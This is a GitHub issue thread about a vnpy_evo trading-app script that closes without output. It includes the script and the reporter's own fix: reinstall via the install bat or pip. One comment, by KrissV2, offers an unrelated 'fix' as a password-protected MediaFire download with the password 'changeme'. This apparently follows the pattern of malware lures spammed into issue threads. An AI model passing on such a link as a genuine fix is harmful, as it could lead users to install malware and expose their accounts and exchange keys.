### ISSUE TITLE
Vnpy_evo 0.3 脚本启动不了，没反应就关闭

### ISSUE THREAD

**Issue by linhertz** [veighna-global/vnpy_evo#59]
PS C:\Vnpy_evo_Trading> python .\run.py

📢 Tips: QFluentWidgets Pro is now released. Click https://qfluentwidgets.com/pages/pro to learn more about it.

PS C:\Vnpy_evo_Trading>

都装好了，脚本启动，没反应。

脚本代码如下：

from vnpy_evo.event import EventEngine
from vnpy_evo.trader.engine import MainEngine
from vnpy_evo.trader.ui import MainWindow, create_qapp

from vnpy_binance import BinanceLinearGateway
from vnpy_novastrategy import NovaStrategyApp

def main():
    """"""
    qapp = create_qapp()
    event_engine = EventEngine()
    main_engine = MainEngine(event_engine)
    main_engine.add_gateway(BinanceLinearGateway)
    main_engine.add_app(NovaStrategyApp)
    main_window = MainWindow(main_engine, event_engine)
    main_window.showMaximized()
    qapp.exec()

if __name__ == "__main__":
    main()`

**Comment by linhertz** [comment]
上面安装方式是用 python setup.py install进行的，应该是丢了模块。直接运行一下，window_install_bat可以解决。

pip install vnpy_evo应该也可以。

![image](https://github.com/user-attachments/assets/9aa8b611-7aad-40d9-b8f2-a8fc97b371f2)

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by veighna-global** [comment]
Thanks for your feedback!
